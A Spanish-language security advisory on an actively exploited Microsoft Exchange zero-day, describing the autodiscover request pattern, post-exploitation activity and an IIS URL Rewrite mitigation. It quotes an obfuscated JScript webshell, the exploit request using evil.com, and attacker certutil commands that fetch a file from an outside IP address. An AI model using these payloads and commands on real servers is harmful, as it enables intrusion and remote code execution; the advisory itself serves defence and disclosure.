Novedades

Detalle técnico

Recientemente la empresa de Ciberseguridad vietnamita GTSC, detectó e informó sobre vulnerabilidad 0-Day en la plataforma Microsoft Exchange, lo que permite la ejecución de código remoto, la misma fue descubierta en el código de Exchange, la cual se clasificó como crítica.

Asimismo, GTSC envió la vulnerabilidad a Zero Day Initiative (ZDI) para trabajar con Microsoft para que pudieran preparar un parche lo antes posible. ZDI verificó y validó 2 errores, cuyos puntajes CVSS actualmente son 8.8 y 6.3.

Dicha actividad exploit se realiza en 2 pasos:

• Solicitudes con un formato similar a la vulnerabilidad de ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com.

• El uso del enlace anterior para acceder a un componente en el backend donde se podría implementar el RCE (Remote Code Execution).

Actividades posteriores a la explotación

Webshell

El atacante usa Antsword, una herramienta activa de administración de sitios web multiplataforma de código abierto con sede en China que admite la administración de webshell.

<%@Page Language="Jscript"%>

<%eval(codificación System.Text.En. GetEncoding(936). GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936). GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936). GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

Otra característica es que el atacante cambia el contenido del archivo RedirSuiteServiceProxy.aspx a contenido de webshell. RedirSuiteServiceProxy.aspx es un nombre de archivo legítimo disponible en el servidor de Exchange.

Ejecución de comandos

Además de recopilar información sobre el sistema, el atacante descarga archivos y comprueba las conexiones a través de certutil, que es una herramienta legítima disponible en el entorno de Windows, inyecta DLL maliciosos en la memoria, deja caer archivos sospechosos en los servidores atacados y ejecuta estos archivos a través de WMIC.

"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Cabe señalar que cada comando termina con la cadena echo [S]&cd&echo [E], que es una de las firmas del Chopper chino.

Recomendación

Como medida temporal (confirmada), y mientras se espera por el parche oficial por parte de Microsoft, se recomienda añadir una regla de bloqueo en el módulo URL Rewrite Rule de IIS.

• En «Autodiscover» en «FrontEnd» seleccione la pestaña «URL Rewrite» y luego «Request Blocking«.

• Agregue el siguiente string en «URL Path«: “.*autodiscover\.json.*\@.*Powershell.*“.

• En «Condition» elija {REQUEST_URI}.

Se sugiere actualizar Microsoft Exchange a la última versión disponible lo antes posible, hasta que encuentre a disposición el parche correspondiente.

Fuentes

• https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html

• https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-day-actively-exploited-in-attacks/